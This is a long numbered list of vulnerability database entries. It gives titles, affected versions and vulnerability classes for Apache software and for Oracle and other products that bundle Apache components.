13685| [125599] Oracle Retail Open Commerce Platform 5.3.0/6.0.0/6.0.1 Apache Log4j unknown vulnerability
13686| [125569] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56 Apache HTTP Server information disclosure
13687| [125494] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat information disclosure
13688| [125447] Oracle Business Intelligence Enterprise Edition 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Batik unknown vulnerability
13689| [125428] Oracle Identity Management Suite 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
13690| [125427] Oracle Identity Analytics 11.1.1.5.8 Apache Log4j unknown vulnerability
13691| [125424] Oracle API Gateway 11.1.2.4.0 Apache Log4j unknown vulnerability
13692| [125423] Oracle BI Publisher 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Log4j unknown vulnerability
13693| [125383] Oracle up to 10.2.0 Apache Trinidad unknown vulnerability
13694| [125379] Oracle up to 10.1.x Apache Struts 1 cross site scripting
13695| [125377] Oracle up to 10.2.0 Apache Commons Collections unknown vulnerability
13696| [125376] Oracle Communications Application Session Controller up to 3.7.0 Apache Commons Collections unknown vulnerability
13697| [125375] Oracle Communications User Data Repository up to 12.1.x Apache Xerces memory corruption
13698| [125248] Apache ActiveMQ up to 5.15.5 Web-based Administration Console queue.jsp Parameter cross site scripting
13699| [125133] Apache Tika up to 1.19 XML Parser reset() denial of service
13700| [124877] Apache PDFbox up to 2.0.11 PDF File denial of service
13701| [124876] Apache Ranger up to 1.1.x UnixAuthenticationService Stack-based memory corruption
13702| [124791] Apache Tomcat up to 7.0.90/8.5.33/9.0.11 URL Open Redirect
13703| [124787] Apache Pony Mail 0.7/0.8/0.9 Statistics Generator Timestamp Data information disclosure
13704| [124447] Apache HTTP Server up to 2.4.34 SETTINGS Frame denial of service
13705| [124346] Apache Mesos pre-1.4.2/1.5.0/1.5.1/1.6.0 on Executor HTTP API String Comparison validation JSON Web Token information disclosure
13706| [124286] Apache Tika up to 1.18 IptcAnpaParser Loop denial of service
13707| [124242] Apache Tika up to 0.18 C:/evil.bat" Directory unknown vulnerability
13708| [124241] Apache Tika up to 0.18 XML Parser Entity Expansion denial of service
13709| [124191] Apache Karaf up to 3.0.8/4.0.8/4.1.0 WebConsole .../gogo/ weak authentication
13710| [124190] Apache Karaf up to 4.1.x sshd privilege escalation
13711| [124152] Apache Camel Mail up to 2.22.0 Path directory traversal
13712| [124143] Apache SpamAssassin up to 3.4.1 PDFInfo Plugin Code Execution
13713| [124134] Apache SpamAssassin up to 3.4.1 Scan Engine HTML::Parser Email denial of service
13714| [124095] PHP up to 5.6.37/7.0.31/7.1.21/7.2.9 Apache2 sapi_apache2.c php_handler cross site scripting
13715| [124024] Apache Mesos 1.4.x/1.5.0 libprocess JSON Payload denial of service
13716| [123814] Apache ActiveMQ Client up to 5.15.5 TLS Hostname Verification Man-in-the-Middle weak authentication
13717| [123393] Apache Traffic Server up to 6.2.2/7.1.3 ESI Plugin Config privilege escalation
13718| [123392] Apache Traffic Server 6.2.2 TLS Handshake Segmentation Fault denial of service
13719| [123391] Apache Traffic Server up to 6.2.2/7.1.3 Range Request Performance denial of service
13720| [123390] Apache Traffic Server up to 6.2.2/7.1.3 Request HTTP Smuggling privilege escalation
13721| [123369] Apache Traffic Server up to 6.2.2/7.1.3 ACL remap.config Request denial of service
13722| [123197] Apache Sentry up to 2.0.0 privilege escalation
13723| [123145] Apache Struts up to 2.3.34/2.5.16 Namespace Code Execution
13724| [123144] Apache Cayenne up to 4.1.M1 CayenneModeler XML File File Transfer privilege escalation
13725| [122981] Apache Commons Compress 1.7 ZipArchiveInputStream ZIP Archive denial of service
13726| [122889] Apache HTTP Server up to 2.2.31/2.4.23 mod_userdir HTTP Response Splitting privilege escalation
13727| [122800] Apache Spark 1.3.0 REST API weak authentication
13728| [122642] Apache Airflow up to 1.8.x 404 Page Reflected cross site scripting
13729| [122568] Apache Tomcat up to 8.5.31/9.0.9 Connection Reuse weak authentication
13730| [122567] Apache Axis 1.0./1.1/1.2/1.3/1.4 cross site scripting
13731| [122556] Apache Tomcat up to 7.0.86/8.0.51/8.5.30/9.0.7 UTF-8 Decoder Loop denial of service
13732| [122531] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.9 WebSocket Client unknown vulnerability
13733| [122456] Apache Camel up to 2.20.3/2.21.0 XSD Validator XML External Entity
13734| [122455] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Revoked Certificate weak authentication
13735| [122454] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Responder Revoked Certificate weak authentication
13736| [122214] Apache Kafka up to 0.9.0.1/0.10.2.1/0.11.0.2/1.0.0 Broker Request Data Loss denial of service
13737| [122202] Apache Kafka up to 0.10.2.1/0.11.0.1 SASL Impersonation spoofing
13738| [122101] Docker Skeleton Runtime for Apache OpenWhisk Docker Action dockerskeleton:1.3.0 privilege escalation
13739| [122100] PHP Runtime for Apache OpenWhisk Docker Action action-php-v7.2:1.0.0 privilege escalation
13740| [122012] Apache Ignite up to 2.5 Serialization privilege escalation
13741| [121911] Apache Ambari up to 2.5.x/2.6.2 Log Message Credentials information disclosure
13742| [121910] Apache HTTP Server 2.4.33 mod_md HTTP Requests denial of service
13743| [121854] Oracle Tape Library ACSLS up to ACSLS 8.4.0-2 Apache Commons Collections unknown vulnerability
13744| [121752] Oracle Insurance Policy Administration 10.0/10.1/10.2/11.0 Apache Log4j unknown vulnerability
13745| [121370] Apache Spark up to 2.1.2/2.2.1/2.3.0 URL cross site scripting
13746| [121354] Apache CouchDB HTTP API Code Execution
13747| [121144] Apache LDAP API up to 1.0.1 SSL Filter information disclosure
13748| [121143] Apache Storm up to 0.10.2/1.0.6/1.1.2/1.2.1 Cluster privilege escalation
13749| [120436] Apache CXF Fediz up to 1.4.3 Application Plugin unknown vulnerability
13750| [120310] Apache PDFbox up to 1.8.14/2.0.10 AFMParser Loop denial of service
13751| [120168] Apache CXF weak authentication
13752| [120080] Apache Cassandra up to 3.11.1 JMX/RMI Interface RMI Request privilege escalation
13753| [120043] Apache HBase up to 1.2.6.0/1.3.2.0/1.4.4/2.0.0 Thrift 1 API Server weak authentication
13754| [119723] Apache Qpid Broker-J 7.0.0/7.0.1/7.0.2/7.0.3/7.0.4 AMQP Messages Crash denial of service
13755| [122569] Apache HTTP Server up to 2.4.33 HTTP2 Request denial of service
13756| [119486] Apache Geode up to 1.4.0 Security Manager Code Execution
13757| [119306] Apache MXNet Network Interface privilege escalation
13758| [118999] Apache Storm up to 1.0.6/1.1.2/1.2.1 Archive directory traversal
13759| [118996] Apache Storm up to 1.0.6/1.1.2/1.2.1 Daemon spoofing
13760| [118644] Apple macOS up to 10.13.5 apache_mod_php unknown vulnerability
13761| [118200] Apache Batik up to 1.9 Deserialization unknown vulnerability
13762| [118143] Apache NiFi activemq-client Library Deserialization denial of service
13763| [118142] Apache NiFi 1.6.0 SplitXML xxe privilege escalation
13764| [118051] Apache Zookeeper up to 3.4.9/3.5.3-beta weak authentication
13765| [117997] Apache ORC up to 1.4.3 ORC File Recursion denial of service
13766| [117825] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.8 CORS Filter privilege escalation
13767| [117405] Apache Derby up to 10.14.1.0 Network Server Network Packet privilege escalation
13768| [117347] Apache Ambari up to 2.6.1 HTTP Request directory traversal
13769| [117265] LibreOffice/Apache Office Writer SMB Connection XML Document information disclosure
13770| [117143] Apache uimaj/uima-as/uimaFIT/uimaDUCC XML XXE information disclosure
13771| [117117] Apache Tika up to 1.17 ChmParser Loop denial of service
13772| [117116] Apache Tika up to 1.17 BPGParser Loop denial of service
13773| [117115] Apache Tika up to 1.17 tika-server command injection
13774| [116929] Apache Fineract getReportType Parameter privilege escalation
13775| [116928] Apache Fineract REST Endpoint Parameter privilege escalation
13776| [116927] Apache Fineract MakercheckersApiResource Parameter sql injection
13777| [116926] Apache Fineract REST Parameter privilege escalation
13778| [116574] Apache wicket-jquery-ui up to 6.29.0/7.10.1/8.0.0-M9.1 WYSIWYG Editor privilege escalation
13779| [116622] Oracle Enterprise Manager for MySQL Database 12.1.0.4 EM Plugin: General (Apache Tomcat) unknown vulnerability
13780| [115931] Apache Solr up to 6.6.2/7.2.1 XML Data Parameter XML External Entity
13781| [115883] Apache Hive up to 2.3.2 privilege escalation
13782| [115882] Apache Hive up to 2.3.2 xpath_short information disclosure
13783| [115881] Apache DriverHive JDBC Driver up to 2.3.2 Escape Argument Bypass privilege escalation
13784| [115518] Apache Ignite 2.3 Deserialization privilege escalation
13785| [115260] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache cross site scripting
13786| [115259] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache Cookie Stack-based memory corruption
13787| [115500] CA Workload Control Center up to r11.4 SP5 Apache MyFaces Component Code Execution
13788| [115121] Apache Struts REST Plugin up to 2.5.15 Xstream XML Data denial of service
13789| [115061] Apache HTTP Server up to 2.4.29 HTTP Digest Authentication Challenge HTTP Requests Replay privilege escalation
13790| [115060] Apache HTTP Server up to 2.4.29 mod_cache_socache Request Header Crash denial of service
13791| [115059] Apache HTTP Server up to 2.4.29 HTTP2 NULL Pointer Dereference denial of service
13792| [115058] Apache HTTP Server up to 2.4.29 HTTP Header Crash denial of service
13793| [115057] Apache HTTP Server up to 2.4.29 mod_session Variable Name Cache privilege escalation
13794| [115039] Apache HTTP Server up to 2.4.29 FilesMatch File Upload privilege escalation
13795| [115038] Apache HTTP Server up to 2.0.65/2.2.34/2.4.29 mod_authnz_ldap Crash denial of service
13796| [114817] Apache Syncope up to 1.2.10/2.0.7 Search Parameter information disclosure
13797| [114816] Apache Syncope up to 1.2.10/2.0.7 XSLT Code Execution
13798| [114717] Apache Commons 1.11/1.12/1.13/1.14/1.15 ZIP Archive ZipFile/ZipArchiveInputStream denial of service
13799| [114661] Apache Allura up to 1.8.0 HTTP Response Splitting privilege escalation
13800| [114400] Apache Tomcat JK ISAPI Connector up to 1.2.42 IIS/ISAPI privilege escalation
13801| [114258] Apache HTTP Server up to 2.4.22 mod_cluster Segmentation Fault denial of service
13802| [114086] Apache ODE 1.3.3 ODE Process Deployment Web Service directory traversal
13803| [113955] Apache Xerces-C up to 3.2.0 XML Parser NULL Pointer Dereference denial of service
13804| [113945] Apache Tomcat up to 7.0.84/8.0.49/8.5.27/9.0.4 URL Pattern Empty String privilege escalation
13805| [113944] Apache OpenMeetings up to 3.x/4.0.1 CRUD Operation denial of service
13806| [113905] Apache Traffic Server up to 5.2.x/5.3.2/6.2.0/7.0.0 TLS Handshake Core Dump denial of service
13807| [113904] Apache Traffic Server up to 6.2.0 Host Header privilege escalation
13808| [113895] Apache Geode up to 1.3.x Code Execution
13809| [113894] Apache Geode up to 1.3.x TcpServer Code Execution
13810| [113888] Apache James Hupa WebMail 0.0.2 cross site scripting
13811| [113813] Apache Geode Cluster up to 1.3.x Secure Mode privilege escalation
13812| [113747] Apache Tomcat Servlets privilege escalation
13813| [113647] Apache Qpid up to 0.30 qpidd Broker AMQP Message Crash denial of service
13814| [113645] Apache VCL up to 2.1/2.2.1/2.3.1 Web GUI/XMLRPC API privilege escalation
13815| [113560] Apache jUDDI Console 3.0.0 Log Entries spoofing
13816| [113571] Apache Oozie up to 4.3.0/5.0.0-beta1 XML Data XML File privilege escalation
13817| [113569] Apache Karaf up to 4.0.7 LDAPLoginModule LDAP injection denial of service
13818| [113273] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
13819| [113198] Apache Qpid Dispatch Router 0.7.0/0.8.0 AMQP denial of service
13820| [113186] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
13821| [113145] Apache Thrift up to 0.9.3 Go Client Library privilege escalation
13822| [113106] Apache jUDDI up to 3.3.3 XML Data WADL2Java/WSDL2Java XML Document privilege escalation
13823| [113105] Apache Qpid Broker-J 7.0.0 AMQP Crash denial of service
13824| [112885] Apache Allura up to 1.8.0 File information disclosure
13825| [112856] Apache CloudStack up to 4.8.1.0/4.9.0.0 API weak authentication
13826| [112855] Apache CloudStack 4.1.0/4.1.1 API information disclosure
13827| [112678] Apache Tomcat up to 7.0.82/8.0.47/8.5.23/9.0.1 Bug Fix 61201 privilege escalation
13828| [112677] Apache Tomcat Native Connector up to 1.1.34/1.2.14 OCSP Checker Client weak authentication
13829| [112625] Apache POI up to 3.16 Loop denial of service
13830| [112448] Apache NiFi up to 1.3.x Deserialization privilege escalation
13831| [112396] Apache Hadoop 2.7.3/2.7.4 YARN NodeManager Credentials information disclosure
13832| [112339] Apache NiFi 1.5.0 Header privilege escalation
13833| [112330] Apache NiFi 1.5.0 Header HTTP Request privilege escalation
13834| [112314] NetGain Enterprise Manager 7.2.730 Build 1034 org.apache.jsp.u.jsp.tools.exec_jsp Servlet Parameter privilege escalation
13835| [112253] Apache Hadoop up to 0.23.x/2.7.4/2.8.2 MapReduce Job History Server Configuration File privilege escalation
13836| [112171] Oracle Secure Global Desktop 5.3 Apache Log4j privilege escalation
13837| [112164] Oracle Agile PLM 9.3.5/9.3.6 Apache Tomcat unknown vulnerability
13838| [112161] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Tomcat privilege escalation
13839| [112158] Oracle Autovue for Agile Product Lifecycle Management 21.0.0/21.0.1 Apache Log4j privilege escalation
13840| [112156] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Log4j privilege escalation
13841| [112155] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Apache Log4j privilege escalation
13842| [112137] Oracle MICROS Relate CRM Software 10.8.x/11.4.x/15.0.x, Apache Tomcat unknown vulnerability
13843| [112136] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat privilege escalation
13844| [112133] Oracle Retail Workforce Management 1.60.7/1.64.0 Apache Log4j privilege escalation
13845| [112129] Oracle Retail Assortment Planning 14.1.3/15.0.3/16.0.1 Apache Log4j privilege escalation
13846| [112114] Oracle 9.1 Apache Log4j privilege escalation
13847| [112113] Oracle 9.1 Apache Log4j privilege escalation
13848| [112045] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat privilege escalation
13849| [112038] Oracle Health Sciences Empirica Inspections 1.0.1.1 Apache Tomcat information disclosure
13850| [112019] Oracle Endeca Information Discovery Integrator 3.1.0/3.2.0 Apache Tomcat privilege escalation
13851| [112017] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 Apache Struts 1 cross site scripting
13852| [112011] Oracle Identity Manager 11.1.2.3.0 Apache Commons Collections privilege escalation
13853| [111950] Oracle Database 12.2.0.1 Apache Tomcat information disclosure
13854| [111703] Apache Sling XSS Protection API 1.0.4 URL Encoding cross site scripting
13855| [111556] Apache Geode up to 1.2.x Secure Mode Parameter OQL privilege escalation
13856| [111555] Apache Geode up to 1.2.x Secure Mode OQL privilege escalation
13857| [111540] Apache Geode up to 1.2.x Secure Mode information disclosure
13858| [111519] Apache Sling JCR ContentLoader 2.1.4 xmlreader directory traversal
13859| [111338] Apache DeltaSpike-JSF 1.8.0 cross site scripting
13860| [111330] Apache OFBiz 16.11.01/16.11.02/16.11.03 BIRT Plugin cross site scripting
13861| [110789] Apache Sling up to 1.4.0 Authentication Service Credentials information disclosure
13862| [110785] Apache Drill up to 1.11.0 Query Page unknown vulnerability
13863| [110701] Apache Fineract Query Parameter sql injection
13864| [110484] Apache Synapse up to 3.0.0 Apache Commons Collections Serialized Object Code Injection privilege escalation
13865| [110426] Adobe Experience Manager 6.0/6.1/6.2/6.3 Apache Sling Servlets Post cross site scripting
13866| [110141] Apache Struts up to 2.5.14 REST Plugin denial of service
13867| [110140] Apache Qpid Broker-J up to 0.32 privilege escalation
13868| [110139] Apache Qpid Broker-J up to 6.1.4 AMQP Frame denial of service
13869| [110106] Apache CXF Fediz Spring cross site request forgery
13870| [109766] Apache OpenOffice up to 4.1.3 DOC File Parser WW8Fonts memory corruption
13871| [109750] Apache OpenOffice up to 4.1.3 DOC File Parser ImportOldFormatStyles memory corruption
13872| [109749] Apache OpenOffice up to 4.1.3 PPT File Parser PPTStyleSheet memory corruption
13873| [109606] October CMS Build 412 Apache Configuration File Upload privilege escalation
13874| [109419] Apache Camel up to 2.19.3/2.20.0 camel-castor Java Object Deserialization privilege escalation
13875| [109418] Apache Camel up to 2.19.3/2.20.0 camel-hessian Java Object Deserialization privilege escalation
13876| [109400] Apache CouchDB up to 1.6.x/2.1.0 Database Server Shell privilege escalation
13877| [109399] Apache CouchDB up to 1.6.x/2.1.0 JSON Parser Shell privilege escalation
13878| [109398] Apache CXF 3.1.14/3.2.1 JAX-WS/JAX-RS Attachment denial of service
13879| [108872] Apache Hive up to 2.1.1/2.2.0/2.3.0 Policy Enforcement privilege escalation
13880| [108939] Apple macOS up to 10.13.1 apache unknown vulnerability
13881| [108938] Apple macOS up to 10.13.1 apache denial of service
13882| [108937] Apple macOS up to 10.13.1 apache unknown vulnerability
13883| [108936] Apple macOS up to 10.13.1 apache unknown vulnerability
13884| [108935] Apple macOS up to 10.13.1 apache denial of service
13885| [108934] Apple macOS up to 10.13.1 apache unknown vulnerability
13886| [108933] Apple macOS up to 10.13.1 apache unknown vulnerability
13887| [108932] Apple macOS up to 10.13.1 apache unknown vulnerability
13888| [108931] Apple macOS up to 10.13.1 apache denial of service
13889| [108930] Apple macOS up to 10.13.1 apache unknown vulnerability
13890| [108929] Apple macOS up to 10.13.1 apache denial of service
13891| [108928] Apple macOS up to 10.13.1 apache unknown vulnerability
13892| [108797] Apache Struts up to 2.3.19 TextParseUtiltranslateVariables OGNL Expression privilege escalation
13893| [108795] Apache Traffic Server up to 5.3.0 HTTP2 set_dynamic_table_size memory corruption
13894| [108794] Apache WSS4J up to 1.6.16/2.0.1 Incomplete Fix Leak information disclosure
13895| [108793] Apache Qpid up to 0.30 qpidd Crash denial of service
13896| [108792] Apache Traffic Server up to 5.1.0 Access Restriction privilege escalation
13897| [108791] Apache Wicket up to 1.5.11/6.16.x/7.0.0-M2 Session information disclosure
13898| [108790] Apache Storm 0.9.0.1 Log Viewer directory traversal
13899| [108789] Apache Cordova In-App-Browser Standalone Plugin up to 0.3.1 on iOS CDVInAppBrowser privilege escalation
13900| [108788] Apache Cordova File-Transfer Standalone Plugin up to 0.4.1 on iOS ios/CDVFileTransfer.m spoofing
13901| [108787] Apache HttpClient up to 4.3.0 HttpClientBuilder.java unknown vulnerability
13902| [108786] Apache Wicket up to 1.4.21/1.5.9/6.3.x script Tag cross site scripting
13903| [108783] Apache Hadoop up to 0.23.3/1.0.3/2.0.1 Kerberos Security Feature Key weak encryption
13904| [108782] Apache Xerces2 XML Service denial of service
13905| [108781] Apache jUDDI up to 1.x happyjuddi.jsp Parameter cross site scripting
13906| [108780] Apache jUDDI up to 1.x Log File uddiget.jsp spoofing
13907| [108709] Apache Cordova Android up to 3.7.1/4.0.1 intent URL privilege escalation
13908| [108708] Apache ActiveMQ up to 5.10.0 XML Data XML External Entity
13909| [108707] Apache ActiveMQ up to 1.7.0 XML Data XML External Entity
13910| [108629] Apache OFBiz up to 10.04.01 privilege escalation
13911| [108543] Apache Derby 10.1.2.1/10.2.2.0/10.3.1.4/10.4.1.3 Export File privilege escalation
13912| [108312] Apache HTTP Server on RHEL IP Address Filter privilege escalation
13913| [108297] Apache NiFi up to 0.7.1/1.1.1 Proxy Chain Username Deserialization privilege escalation
13914| [108296] Apache NiFi up to 0.7.1/1.1.1 Cluster Request privilege escalation
13915| [108250] Oracle Secure Global Desktop 5.3 Apache HTTP Server memory corruption
13916| [108245] Oracle Transportation Management up to 6.3.7 Apache Tomcat unknown vulnerability
13917| [108244] Oracle Transportation Management 6.4.1/6.4.2 Apache Commons FileUpload denial of service
13918| [108243] Oracle Agile Engineering Data Management 6.1.3/6.2.0 Apache Commons Collections memory corruption
13919| [108222] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Batik denial of service
13920| [108219] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat unknown vulnerability
13921| [108217] Oracle Retail Store Inventory Management 13.2.9/14.0.4/14.1.3/15.0.1/16.0.1 Apache Groovy unknown vulnerability
13922| [108216] Oracle Retail Convenience and Fuel POS Software 2.1.132 Apache Groovy unknown vulnerability
13923| [108169] Oracle MySQL Enterprise Monitor up to 3.2.8.2223/3.3.4.3247/3.4.2.4181 Apache Tomcat unknown vulnerability
13924| [108113] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Batik denial of service
13925| [108107] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat unknown vulnerability
13926| [108102] Oracle Healthcare Master Person Index 4.x Apache Groovy unknown vulnerability
13927| [108085] Oracle Identity Manager 11.1.2.3.0 Apache Struts 1 memory corruption
13928| [108083] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
13929| [108080] Oracle GlassFish Server 3.1.2 Apache Commons FileUpload denial of service
13930| [108066] Oracle Management Pack for GoldenGate 11.2.1.0.12 Apache Tomcat memory corruption
13931| [108062] Oracle BI Publisher 11.1.1.7.0/12.2.1.1.0/12.2.1.2.0 Apache ActiveMQ memory corruption
13932| [108060] Oracle Enterprise Manager Ops Center 12.2.2/12.3.2 Apache Groovy unknown vulnerability
13933| [108033] Oracle Primavera Unifier 9.13/9.14/10.x/15.x/16.x, Apache Groovy unknown vulnerability
13934| [108013] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Apache Groovy unknown vulnerability
13935| [108011] Oracle Communications Services Gatekeeper 5.1/6.0 Apache Trinidad unknown vulnerability
13936| [107904] Apache Struts up to 2.3.28 Double OGNL Evaluation privilege escalation
13937| [107860] Apache Solr up to 7.0 Apache Lucene RunExecutableListener XML External Entity
13938| [107834] Apache Ranger up to 0.6.1 Change Password privilege escalation
13939| [107639] Apache NiFi 1.4.0 XML External Entity
13940| [107606] Apache ZooKeper up to 3.4.9/3.5.2 Command CPU Exhaustion denial of service
13941| [107597] Apache Roller up to 5.0.2 XML-RPC Protocol Support XML External Entity
13942| [107429] Apache Impala up to 2.9.x Kudu Table privilege escalation
13943| [107411] Apache Tomcat up to 7.0.81/8.0.46/8.5.22/9.0.0 JSP File File Upload privilege escalation
13944| [107385] Apache Geode up to 1.2.0 Secure Mode privilege escalation
13945| [107339] Apache OpenNLP up to 1.5.3/1.6.0/1.7.2/1.8.1 XML Data XML External Entity
13946| [107333] Apache Wicket up to 8.0.0-M1 CSRF Prevention HTTP Header privilege escalation
13947| [107323] Apache Wicket 1.5.10/6.13.0 Class Request information disclosure
13948| [107310] Apache Geode up to 1.2.0 Command Line Utility Query privilege escalation
13949| [107276] ArcSight ESM/ArcSight ESM Express up to 6.9.1c Patch 3/6.11.0 Apache Tomcat Version information disclosure
13950| [107266] Apache Tika up to 1.12 XML Parser XML External Entity
13951| [107262] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
13952| [107258] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
13953| [107197] Apache Xerces Jelly Parser XML File XML External Entity
13954| [107193] ZTE NR8950 Apache Commons Collections RMI Request Deserialization privilege escalation
13955| [107084] Apache Struts up to 2.3.19 cross site scripting
13956| [106877] Apache Struts up to 2.0.33/2.5.10 Freemarker Tag privilege escalation
13957| [106875] Apache Struts up to 2.5.5 URL Validator denial of service
13958| [106874] Apache Struts up to 2.3.30 Convention Plugin directory traversal
13959| [106847] Apache Tomcat up to 7.0.80 VirtualDirContext Source information disclosure
13960| [106846] Apache Tomcat up to 7.0.79 on Windows HTTP PUT Method Parameter File Upload privilege escalation
13961| [106777] Apache HTTP Server up to 2.2.34/2.4.27 Limit Directive ap_limit_section HTTP Request information disclosure
13962| [106739] puppetlabs-apache up to 1.11.0/2.0.x weak authentication
13963| [106720] Apache Wicket up to 1.5.12/6.18.x/7.0.0-M4 CryptoMapper privilege escalation
13964| [106586] Apache Brooklyn up to 0.9.x REST Server cross site scripting
13965| [106562] Apache Spark up to 2.1.1 Launcher API Deserialization privilege escalation
13966| [106559] Apache Brooklyn up to 0.9.x SnakeYAML YAML Data Java privilege escalation
13967| [106558] Apache Brooklyn up to 0.9.x REST Server cross site request forgery
13968| [106556] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
13969| [106555] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
13970| [106171] Apache Directory LDAP API up to 1.0.0-M30 Timing unknown vulnerability
13971| [106167] Apache Struts up to 2.5.12 REST Plugin XML Data privilege escalation
13972| [106166] Apache Struts up to 2.3.33/2.5.12 REST Plugin denial of service
13973| [106165] Apache Struts up to 2.3.33/2.5.12 URLValidator Regex CPU Exhaustion denial of service
13974| [106115] Apache Hadoop up to 2.6.4/2.7.2 YARN NodeManager Password information disclosure
13975| [106012] Apache Solr up to 5.5.3/6.4.0 Replication directory traversal
13976| [105980] Apache Engine 16.11.01 Parameter Reflected unknown vulnerability
13977| [105962] Apache Atlas 0.6.0/0.7.0 Frame cross site scripting
13978| [105961] Apache Atlas 0.6.0/0.7.0 Stack Trace information disclosure
13979| [105960] Apache Atlas 0.6.0/0.7.0 Search Reflected cross site scripting
13980| [105959] Apache Atlas 0.6.0/0.7.0 edit Tag DOM cross site scripting
13981| [105958] Apache Atlas 0.6.0/0.7.0 edit Tag Stored cross site scripting
13982| [105957] Apache Atlas 0.6.0/0.7.0 Cookie privilege escalation
13983| [105905] Apache Atlas 0.6.0/0.7.0/0.7.1 /js privilege escalation
13984| [105878] Apache Struts up to 2.3.24.0 privilege escalation
13985| [105682] Apache2Triad 1.5.4 phpsftpd/users.php Parameter cross site scripting
13986| [105681] Apache2Triad 1.5.4 phpsftpd/users.php Request cross site request forgery
13987| [105680] Apache2Triad 1.5.4 Parameter Session Fixation weak authentication
13988| [105643] Apache Pony Mail up to 0.8b weak authentication
13989| [105288] Apache Sling up to 2.3.21 Sling.evalString() String cross site scripting
13990| [105219] Apache Tomcat up to 8.5.15/9.0.0.M21 HTTP2 Bypass directory traversal
13991| [105218] Apache Tomcat up to 7.0.78/8.0.44/8.5.15/9.0.0.M21 CORS Filter Cache Poisoning privilege escalation
13992| [105215] Apache CXF up to 3.0.12/3.1.9 OAuth2 Hawk/JOSE MAC Validation Timing unknown vulnerability
13993| [105206] Apache CXF up to 3.0.11/3.1.8 JAX-RS Module XML External Entity
13994| [105205] Apache CXF up to 3.0.11/3.1.8 HTTP Transport Module Parameter cross site scripting
13995| [105202] Apache Storm 1.0.0/1.0.1/1.0.2/1.0.3/1.1.0 Worker privilege escalation
13996| [104987] Apache Xerces-C++ XML Service CPU Exhaustion denial of service
13997| [104986] Apache CXF 2.4.5/2.5.1 WS-SP UsernameToken Policy SOAP Request weak authentication
13998| [104985] Apache MyFaces Core up to 2.1.4 EL Expression Parameter Injection information disclosure
13999| [104983] Apache Wink up to 1.1.1 XML Document xxe privilege escalation
14000| [104981] Apache Commons Email 1.0/1.1/1.2/1.3/1.4 Subject Linebreak SMTP privilege escalation
14001| [104591] MEDHOST Document Management System Apache Solr Default Credentials weak authentication
14002| [104062] Oracle MySQL Enterprise Monitor up to 3.3.3.1199 Apache Tomcat unknown vulnerability
14003| [104061] Oracle MySQL Enterprise Monitor up to 3.2.7.1204/3.3.3.1199 Apache Tomcat unknown vulnerability
14004| [104060] Oracle MySQL Enterprise Monitor up to 3.1.5.7958/3.2.5.1141/3.3.2.1162 Apache Struts 2 unknown vulnerability
14005| [103995] Oracle 8.3/8.4/15.1/15.2 Apache Trinidad unknown vulnerability
14006| [103993] Oracle Policy Automation up to 12.2.3 Apache Commons FileUplaod denial of service
14007| [103916] Oracle Banking Platform 2.3/2.4/2.4.1/2.5 Apache Commons FileUpload denial of service
14008| [103906] Oracle Communications BRM 11.2.0.0.0 Apache Commons Collections privilege escalation
14009| [103904] Oracle Communications BRM 11.2.0.0.0/11.3.0.0.0 Apache Groovy memory corruption
14010| [103866] Oracle Transportation Management 6.1/6.2 Apache Webserver unknown vulnerability
14011| [103816] Oracle BI Publisher 11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Apache Commons Fileupload denial of service
14012| [103797] Oracle Tuxedo System and Applications Monitor Apache Commons Collections privilege escalation
14013| [103792] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Commons Fileupload privilege escalation
14014| [103791] Oracle Endeca Server 7.6.0.0/7.6.1.0 Apache Commons Collections privilege escalation
14015| [103788] Oracle Enterprise Repository 11.1.1.7.0/12.1.3.0.0 Apache ActiveMQ memory corruption
14016| [103787] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Groovy memory corruption
14017| [103763] Apache Sling up to 1.0.11 XSS Protection API XSS.getValidXML() Application XML External Entity
14018| [103762] Apache Sling up to 1.0.12 XSS Protection API XSSAPI.encodeForJSString() Script Tag cross site scripting
14019| [103693] Apache OpenMeetings 1.0.0 HTTP Method privilege escalation
14020| [103692] Apache OpenMeetings 1.0.0 Tomcat Error information disclosure
14021| [103691] Apache OpenMeetings 3.2.0 Parameter privilege escalation
14022| [103690] Apache OpenMeetings 1.0.0 sql injection
14023| [103689] Apache OpenMeetings 1.0.0 crossdomain.xml privilege escalation
14024| [103688] Apache OpenMeetings 1.0.0 weak encryption
14025| [103687] Apache OpenMeetings 1.0.0 cross site request forgery
14026| [103556] Apache Roller 5.1.0/5.1.1 Weblog Page Template VTL privilege escalation
14027| [103554] Apache OpenMeetings 1.0.0 Password Update unknown vulnerability
14028| [103553] Apache OpenMeetings 1.0.0 File Upload privilege escalation
